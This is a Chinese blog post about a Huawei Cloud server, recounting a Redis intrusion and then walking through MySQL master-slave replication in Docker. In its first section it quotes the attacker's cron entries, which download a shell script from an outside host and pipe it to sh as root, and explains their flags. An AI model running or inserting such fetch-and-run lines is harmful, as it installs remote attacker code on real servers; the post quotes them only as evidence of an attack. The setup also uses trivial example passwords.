-
华为云云耀云服务器L实例评测|redis漏洞回顾 & MySQL数据安全解决 搭建主从集群MySQL & 相关设置
前言
最近华为云云耀云服务器L实例上新,也搞了一台来玩,期间遇到过MySQL数据库被攻击的情况,数据丢失,还好我有几份备份,没有造成太大的损失;后来有发现Redis数据库被攻击的情况,加入了redis密码初步解决问题。总之就是各种遭受毒打。。。
本篇博客回顾Redis的未授权访问漏洞,介绍MySQL主从集群的搭建,以及相关的配置
其他相关的华为云云耀云服务器L实例评测文章列表如下:
引出
1.redis数据安全的简单回顾;
2.MySQL主从搭建的流程和注意事项;
3.主从不同步的剞劂,以及只读权限的设置;
一、redis数据安全的问题
1.之前被攻击留下的痕迹
*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh */3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh */4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh */5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh- 1
- 2
- 3
- 4
2.攻击命令的解读
root wget -q -O-是一个有效的命令。它使用wget命令来下载一个文件,并将其输出到标准输出(stdout)。root表示以 root 用户身份执行该命令。wget是一个用于从网络上下载文件的命令行工具。-q选项表示静默模式,即不显示下载进度和其他信息。-O-选项表示将下载的文件输出到标准输出(stdout)。
这个命令通常用于下载文件并将其传递给其他命令进行处理,或者将文件内容重定向到其他地方进行保存或处理。
root curl -fsSL是一个有效的命令。它使用curl命令来从指定的URL下载文件,并将其输出到标准输出(stdout)。root表示以 root 用户身份执行该命令。curl是一个用于从网络上获取数据的命令行工具。-fsSL是一些选项,具体含义如下:-f选项表示在下载文件时,如果服务器返回错误状态码,不显示错误信息。-s选项表示静默模式,即不显示进度和其他信息。-S选项表示在发生错误时显示错误信息。-L选项表示跟随重定向,即如果服务器返回重定向响应,自动跳转到新的URL。
这个命令通常用于下载文件并将其传递给其他命令进行处理,或者将文件内容重定向到其他地方进行保存或处理。
二、MySQL主从本地搭建
由于MySQL主从的搭建相比Redis主从搭建还是要复杂很多的,之前几次尝试都失败,最后终于搭建成功,因此先介绍如何在本地虚拟机中搭建主从。
1.挂载启动主MySQL
docker run
- -i:以交互模式运行容器
- -t:为容器重新分配一个伪输入终端
- —name :容器名称
- —privileged: 设置容器公开权限(默认为true)
- -p :映射端口 linux端口: 容器内置端口(mysql默认端口为3306)
- -v : linux挂载文件夹/文件和容器内路径的映射
- -e: 容器的环境变量(设置mysql默认用户名&密码)
- -d: 后台运行容器,并返回容器ID
docker run -it \ --name mysql_3316 \ --privileged \ -p 3316:3306 \ -v /usr/local/software/mysql/3316/conf/my.cnf:/etc/mysql/my.cnf \ -v /usr/local/software/mysql/3316/data:/var/lib/mysql \ -v /usr/local/software/mysql/3316/mysql-files:/var/lib/mysql-files \ -e MYSQL_ROOT_PASSWORD=123 \ -d mysql- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
mysql日志文件容器中的位置
mysql的主的状态,binlog日志文件名,以及位置
主从搭建的前提条件,binlog日志文件开启,MySQL8以上默认开启
mysql> show variables like 'log_%'; +----------------------------------------+----------------------------------------+ | Variable_name | Value | +----------------------------------------+----------------------------------------+ | log_bin | ON | | log_bin_basename | /var/lib/mysql/binlog | | log_bin_index | /var/lib/mysql/binlog.index | | log_bin_trust_function_creators | OFF | | log_bin_use_v1_row_events | OFF | | log_error | stderr | | log_error_services | log_filter_internal; log_sink_internal | | log_error_suppression_list | | | log_error_verbosity | 2 | | log_output | FILE | | log_queries_not_using_indexes | OFF | | log_raw | OFF | | log_replica_updates | ON | | log_slave_updates | ON | | log_slow_admin_statements | OFF | | log_slow_extra | OFF | | log_slow_replica_statements | OFF | | log_slow_slave_statements | OFF | | log_statements_unsafe_for_binlog | ON | | log_throttle_queries_not_using_indexes | 0 | | log_timestamps | UTC | +----------------------------------------+----------------------------------------+ 21 rows in set (0.00 sec) mysql>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
在Navicat中也可以看
2.修改主的配置文件
server_id=200 log_bin=mysql-bin binlog_format=row- 1
- 2
- 3
主要的配置项如下所示
[mysqld] pid-file =/var/run/mysqld/mysqld.pid socket =/var/run/mysqld/mysqld.sock datadir =/var/lib/mysql secure-file-priv = NULL default-authentication-plugin=mysql_native_password # customer config here !includedir /etc/mysql/conf.d/ server_id = 200- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
检验:挂载启动的配置是否生效
mysql> show master status; +---------------+----------+--------------+------------------+-------------------+ | File | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set | +---------------+----------+--------------+------------------+-------------------+ | binlog.000002 | 157 | | | | +---------------+----------+--------------+------------------+-------------------+ 1 row in set (0.00 sec) mysql> show variables like 'server_id'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | server_id | 200 | +---------------+-------+ 1 row in set (0.00 sec)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
再修改一下binlog日志文件的文件名
server_id = 209 log_bin=mysql-bin binlog-format=row- 1
- 2
- 3
说明挂载启动成功
mysql> show master status; +------------------+----------+--------------+------------------+-------------------+ | File | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set | +------------------+----------+--------------+------------------+-------------------+ | mysql-bin.000001 | 157 | | | | +------------------+----------+--------------+------------------+-------------------+ 1 row in set (0.00 sec) mysql> show variables like 'server_id'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | server_id | 209 | +---------------+-------+ 1 row in set (0.01 sec)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
-- 1.创建从用户slave CREATE USER 'slave'@'%' IDENTIFIED WITH mysql_native_password by '567'; -- 2.给用户授权 GRANT replication slave,replication client ON *.* TO 'slave'@'%'; -- 3.应用权限 FLUSH PRIVILEGES;- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
3.在主MySQL中创建slave用户
创建一个slave用户
新增从用户的加密方式
后面配置从需要的参数
该部分全部操作
4.挂载启动从MySQL
从的配置文件
server_id = 211 log_bin=mysql-slave01-bin relay_log=pet-relay-bin read_only=1- 1
- 2
- 3
- 4
docker run -it \ --name mysql_3320 \ --privileged \ -p 3320:3306 \ -v /usr/local/software/mysql/3320/conf/my.cnf:/etc/mysql/my.cnf \ -v /usr/local/software/mysql/3320/data:/var/lib/mysql \ -v /usr/local/software/mysql/3320/mysql-files:/var/lib/mysql-files \ -e MYSQL_ROOT_PASSWORD=123 \ -d mysql- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
开放端口
firewall-cmd --zone=public --add-port=3320/tcp --permanent firewall-cmd --reload firewall-cmd --zone=public --list-ports- 1
- 2
- 3
- 4
- 5
5.在从salve中建立主从关系
主的内部端口号
[root@localhost ~]# docker inspect mysql_3316 | grep IPA "SecondaryIPAddresses": null, "IPAddress": "172.17.0.3", "IPAMConfig": null, "IPAddress": "172.17.0.3", [root@localhost ~]#- 1
- 2
- 3
- 4
- 5
- 6
主的bin-log相关配置
change master to master_host='172.17.0.3', master_user='slave',master_password='567', MASTER_LOG_FILE='mysql-bin.000001', MASTER_LOG_POS=856- 1
- 2
- 3
- 4
进行参数的配置
6.在从slave中查看主从状态
mysql> change master to master_host='172.17.0.3', -> master_user='slave',master_password='567', -> MASTER_LOG_FILE='mysql-bin.000001', -> MASTER_LOG_POS=856; Query OK, 0 rows affected, 8 warnings (0.02 sec) mysql> start slave; Query OK, 0 rows affected, 1 warning (0.01 sec) mysql> show slave status \G; *************************** 1. row *************************** Slave_IO_State: Waiting for source to send event Master_Host: 172.17.0.3 Master_User: slave Master_Port: 3306 Connect_Retry: 60 Master_Log_File: mysql-bin.000001 Read_Master_Log_Pos: 856 Relay_Log_File: eafddc4554f6-relay-bin.000002 Relay_Log_Pos: 326 Relay_Master_Log_File: mysql-bin.000001 Slave_IO_Running: Yes Slave_SQL_Running: Yes- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
三、在华为云上搭建主从
1.准备主从文件夹,上传配置文件
上传附件中配置文件到conf文件夹
2.开放响应的端口
firewall-cmd --zone=public --add-port=3316/tcp --permanent firewall-cmd --reload firewall-cmd --zone=public --list-ports- 1
- 2
- 3
3.挂载启动运行主master
挂载启动的命令
docker run -it \ --name mysql_3316 \ --privileged \ -p 3316:3306 \ -v /usr/local/software/mysql1/3316/conf/my.cnf:/etc/mysql/my.cnf \ -v /usr/local/software/mysql1/3316/data:/var/lib/mysql \ -v /usr/local/software/mysql1/3316/mysql-files:/var/lib/mysql-files \ -e MYSQL_ROOT_PASSWORD=123 \ -d mysql- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
确认一下binlog是否开启
在my.cnf配置文件中增加配置
4.在主master中建立从slave用户
CREATE USER 'slave'@'%' IDENTIFIED WITH mysql_native_password by '567'; GRANT replication slave,replication client ON *.* TO 'slave'@'%'; FLUSH PRIVILEGES;- 1
- 2
- 3
5.挂载自动从slave
docker run -it \ --name mysql_3320 \ --privileged \ -p 3320:3306 \ -v /usr/local/software/mysql1/3320/conf/my.cnf:/etc/mysql/my.cnf \ -v /usr/local/software/mysql1/3320/data:/var/lib/mysql \ -v /usr/local/software/mysql1/3320/mysql-files:/var/lib/mysql-files \ -e MYSQL_ROOT_PASSWORD=123 \ -d mysql- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
开放一下端口
6.在slave中建立主从关系
获得主的内部ip地址
root@hcss-ecs-52b8:~# docker inspect mysql_3316 | grep IPA "SecondaryIPAddresses": null, "IPAddress": "172.17.0.3", "IPAMConfig": null, "IPAddress": "172.17.0.3",- 1
- 2
- 3
- 4
- 5
获得主的相关参数
show variables like 'log_%'; show master status; show variables like 'server_id';- 1
- 2
- 3
建立主从关系
change master to master_host='172.17.0.3', master_user='slave',master_password='567', MASTER_LOG_FILE='mysql-bin.000001', MASTER_LOG_POS=841- 1
- 2
- 3
- 4
记得启动从slave
四、一些问题及其解决
1.从数据不同步的解决
-- 如果主从同步失效,在不能使用的从输入命令 STOP slave; RESET slave; START slave;- 1
- 2
- 3
- 4
2.限制从的权限:创建一个只读的从用户
CREATE USER 'rdb'@'%' IDENTIFIED WITH mysql_native_password by '123'; GRANT SELECT ON *.* TO 'rdb'@'%'; FLUSH PRIVILEGES;- 1
- 2
- 3
创建只允许读的rdb用户
在Navicat中用rdb只读用户登陆,操作命令被拒绝
附件my.cnf配置文件
# For advice on how to change settings please see # http://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html # # Remove leading # and set to the amount of RAM for the most important data # cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%. # innodb_buffer_pool_size = 128M # # Remove leading # to turn on a very important data integrity option: logging # changes to the binary log between backups. # log_bin # # Remove leading # to set options mainly useful for reporting servers. # The server defaults are faster for transactions and fast SELECTs. # Adjust sizes as needed, experiment to find the optimal values. # join_buffer_size = 128M # sort_buffer_size = 2M # read_rnd_buffer_size = 2M # Remove leading # to revert to previous value for default_authentication_plugin, # this will increase compatibility with older clients. For background, see: # https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_default_authentication_plugin # default-authentication-plugin=mysql_native_password # skip-host-cache # skip-name-resolve # socket=/var/run/mysqld/mysqld.sock # secure-file-priv=/var/lib/mysql-files # user=mysql [mysqld] pid-file =/var/run/mysqld/mysqld.pid socket =/var/run/mysqld/mysqld.sock datadir =/var/lib/mysql secure-file-priv = NULL default-authentication-plugin=mysql_native_password # customer config here !includedir /etc/mysql/conf.d/ server_id = 200- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
总结
1.redis数据安全的简单回顾;
2.MySQL主从搭建的流程和注意事项;
3.主从不同步的剞劂,以及只读权限的设置; -
相关阅读:
VScode运行程序弹出小黑窗
AC牛客 BM16 删除有序链表中重复的元素-II
linux 系统安装 or-tools 并在c++ 项目中使用
AWR仿真报错invalid noise data found
100天精通Python(基础篇)——第21天:if elif嵌套
如何PDF转Word文档?两分钟教你三个方法
spi个人笔记
python并发执行request请求
【数据库原理及应用】——SQL概述及数据定义(学习笔记)
爱奇艺:基于龙蜥与 Koordinator 在离线混部的实践解析 | 龙蜥技术
- 原文地址:https://blog.csdn.net/Pireley/article/details/132955411
